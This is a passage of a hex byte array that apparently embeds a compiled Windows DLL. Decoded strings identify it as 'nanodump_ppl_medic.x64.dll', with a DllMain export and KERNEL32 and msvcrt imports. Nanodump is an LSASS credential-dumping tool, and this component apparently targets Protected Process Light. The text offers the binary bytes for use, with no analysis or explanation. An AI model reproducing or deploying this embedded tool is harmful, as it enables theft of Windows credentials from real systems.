08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0xB5,0x11,0x03,0x09,0x01,0x17,0x00,0x02,0x30,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x35,0x0B,0x03,0x06,0x62,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x1C,0x00,0x04,0x03,0x01,0x50,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x3B,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x14,0x00,0x04,0x03,0x01,0x50,0x01,0x0B,0x04,0x75,0x0B,0x03,0x06,0xE2,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x92,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x18,0x00,0x04,0x03,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x0B,0x04,0x35,0x0B,0x03,0x06,0x62,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x92,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x35,0x0B,0x03,0x06,0x62,0x02,0x30,0x01,0x50,0x01,0x12,0x06,0x85,0x12,0x03,0x0A,0x01,0x64,0x00,0x03,0x30,0x02,0x70,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0C,0x05,0x35,0x0C,0x03,0x07,0x52,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0D,0x06,0x55,0x0D,0x03,0x08,0xA2,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x15,0x0A,0x45,0x15,0x03,0x10,0x82,0x0C,0x30,0x0B,0x60,0x0A,0x70,0x09,0xC0,0x07,0xD0,0x05,0xE0,0x03,0xF0,0x01,0x50,0x01,0x11,0x08,0x25,0x11,0x03,0x0C,0x42,0x08,0x30,0x07,0x60,0x06,0x70,0x05,0xC0,0x03,0xD0,0x01,0x50,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x25,0x0B,0x03,0x06,0x42,0x02,0x30,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0B,0x04,0x25,0x0B,0x03,0x06,0x42,0x02,0x30,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x0F,0x07,0x25,0x0F,0x03,0x0A,0x32,0x06,0x30,0x05,0x60,0x04,0x70,0x03,0xC0,0x01,0x50,0x00,0x00,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x32,0x70,0x01,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x70,0x01,0x00,0x2C,0x70,0x01,0x00,0x30,0x70,0x01,0x00,0x87,0xDF,0x00,0x00,0x4D,0x70,0x01,0x00,0x00,0x00,0x6E,0x61,0x6E,0x6F,0x64,0x75,0x6D,0x70,0x5F,0x70,0x70,0x6C,0x5F,0x6D,0x65,0x64,0x69,0x63,0x2E,0x78,0x36,0x34,0x2E,0x64,0x6C,0x6C,0x00,0x44,0x6C,0x6C,0x4D,0x61,0x69,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x80,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x85,0x01,0x00,0xB0,0x81,0x01,0x00,0xB8,0x80,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x86,0x01,0x00,0x28,0x82,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x50,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x60,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x72,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x7E,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x8A,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xA6,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xBE,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xCC,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xD8,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xE0,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xEE,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x1E,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x2C,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x40,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x4A,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x54,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x60,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x68,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x72,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x7A,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x90,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x9A,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xA4,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xAE,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xB6,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xC0,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xC8,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xD2,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xDC,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xE6,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xF0,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xFA,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x14,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x1E,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x28,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x32,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x3C,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x50,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x60,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x72,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x7E,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x8A,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xA6,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xBE,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xCC,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xD8,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xE0,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0xEE,0x83,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x1E,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x2C,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x40,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x4A,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x54,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x60,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x68,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x72,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x7A,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x90,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x9A,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xA4,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xAE,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xB6,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xC0,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xC8,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xD2,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xDC,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xE6,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xF0,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0xFA,0x84,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x14,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x1E,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x28,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x32,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x3C,0x85,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x19,0x01,0x44,0x65,0x6C,0x65,0x74,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x3D,0x01,0x45,0x6E,0x74,0x65,0x72,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0x74,0x02,0x47,0x65,0x74,0x4C,0x61,0x73,0x74,0x45,0x72,0x72,0x6F,0x72,0x00,0x00,0xCA,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x48,0x65,0x61,0x70,0x00,0x00,0x5D,0x03,0x48,0x65,0x61,0x70,0x41,0x6C,0x6C,0x6F,0x63,0x00,0x63,0x03,0x48,0x65,0x61,0x70,0x46,0x72,0x65,0x65,0x00,0x00,0x7A,0x03,0x49,0x6E,0x69,0x74,0x69,0x61,0x6C,0x69,0x7A,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0xD6,0x03,0x4C,0x65,0x61,0x76,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0xE3,0x03,0x4C,0x6F,0x63,0x61,0x6C,0x41,0x6C,0x6C,0x6F,0x63,0x00,0x00,0xE8,0x03,0x4C,0x6F,0x63,0x61,0x6C,0x46,0x72,0x65,0x65,0x00,0x7F,0x05,0x53,0x6C,0x65,0x65,0x70,0x00,0xA2,0x05,0x54,0x6C,0x73,0x47,0x65,0x74,0x56,0x61,0x6C,0x75,0x65,0x00,0xD1,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x00,0x00,0xD3,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x00,0x00,0x54,0x00,0x5F,0x5F,0x69,0x6F,0x62,0x5F,0x66,0x75,0x6E,0x63,0x00,0x00,0x78,0x00,0x5F,0x61,0x6D,0x73,0x67,0x5F,0x65,0x78,0x69,0x74,0x00,0x00,0x1D,0x01,0x5F,0x69,0x6E,0x69,0x74,0x74,0x65,0x72,0x6D,0x00,0x83,0x01,0x5F,0x6C,0x6F,0x63,0x6B,0x00,0xB3,0x02,0x5F,0x74,0x69,0x6D,0x65,0x36,0x34,0x00,0xCA,0x02,0x5F,0x75,0x6E,0x6C,0x6F,0x63,0x6B,0x00,0x0B,0x03,0x5F,0x77,0x63,0x73,0x69,0x63,0x6D,0x70,0x00,0x00,0x87,0x03,0x61,0x62,0x6F,0x72,0x74,0x00,0x98,0x03,0x63,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x00,0xC0,0x03,0x66,0x72,0x65,0x65,0x00,0x00,0xCD,0x03,0x66,0x77,0x72,0x69,0x74,0x65,0x00,0x00,0x00,0x04,0x6D,0x62,0x73,0x74,0x6F,0x77,0x63,0x73,0x00,0x00,0x04,0x04,0x6D,0x65,0x6D,0x63,0x6D,0x70,0x00,0x00,0x05,0x04,0x6D,0x65,0x6D,0x63,0x70,0x79,0x00,0x00,0x07,0x04,0x6D,0x65,0x6D,0x73,0x65,0x74,0x00,0x00,0x19,0x04,0x72,0x61,0x6E,0x64,0x00,0x00,0x1A,0x04,0x72,0x65,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x2E,0x04,0x73,0x72,0x61,0x6E,0x64,0x00,0x35,0x04,0x73,0x74,0x72,0x63,0x6D,0x70,0x00,0x00,0x3C,0x04,0x73,0x74,0x72,0x6C,0x65,0x6E,0x00,0x00,0x3F,0x04,0x73,0x74,0x72,0x6E,0x63,0x6D,0x70,0x00,0x40,0x04,0x73,0x74,0x72,0x6E,0x63,0x70,0x79,0x00,0x43,0x04,0x73,0x74,0x72,0x72,0x63,0x68,0x72,0x00,0x4E,0x04,0x73,0x77,0x70,0x72,0x69,0x6E,0x74,0x66,0x5F,0x73,0x00,0x00,0x60,0x04,0x76,0x66,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0x7A,0x04,0x77,0x63,0x73,0x6C,0x65,0x6E,0x00,0x00,0x7B,0x04,0x77,0x63,0x73,0x6E,0x63,0x61,0x74,0x00,0x7E,0x04,0x77,0x63,0x73,0x6E,0x63,0x70,0x79,0x00,0x82,0x04,0x77,0x63,0x73,0x72,0x63,0x68,0x72,0x00,0x85,0x04,0x77,0x63,0x73,0x73,0x74,0x72,0x00,0x00,0x00,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x00,0x80,0x01,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x14,0x80,0x01,0x00,0x6D,0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE1,0xAD,0x68,0x03,0x00,0x00,0x00,0xD0,0xE0,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0